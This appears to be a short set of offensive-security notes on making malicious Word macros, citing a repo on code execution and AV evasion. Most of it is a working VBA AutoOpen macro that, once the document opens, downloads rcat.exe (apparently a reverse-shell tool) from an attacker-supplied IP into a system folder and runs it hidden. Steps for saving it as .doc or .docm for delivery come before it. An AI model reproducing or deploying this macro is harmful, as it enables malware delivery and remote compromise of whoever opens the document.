Microsoft Office Macros

GitHub - S3cur3Th1sSh1t/OffensiveVBA: This repo covers some code execution and AV Evasion methods for Macros in Office documentsGitHub

Use for macro payload

1. Enable Developer Tools in the Ribbon Menu to gain access to macros

2. Name your Macro AutoOpen() if you are working with Word 2016+

3. Select the Current Document as the place to store the Macro

4. Don't use .docx as the file extension since it won't allow for embedded macros. Either use .doc or .docm

5. When using the 64 bit version of Microsoft Word, Declare VBA functions with "PtrSafe" to avoid compilation errors.

Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" ( _
    ByVal pCaller As Long, _
    ByVal szURL As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long

Private Declare PtrSafe Function WinExec Lib "kernel32" ( _
    ByVal lpCmdLine As String, _
    ByVal uCmdShow As Long) As Long

Sub AutoOpen()
    URLDownloadToFileA 0, "http://<ip>/rcat.exe", "C:\Windows\system32\spool\drivers\color\rcat_10.8.0.123_443.exe", 0, 0
    WinExec "C:\Windows\system32\spool\drivers\color\rcat_<ip>_<port>.exe", SHOW_HIDE
End Sub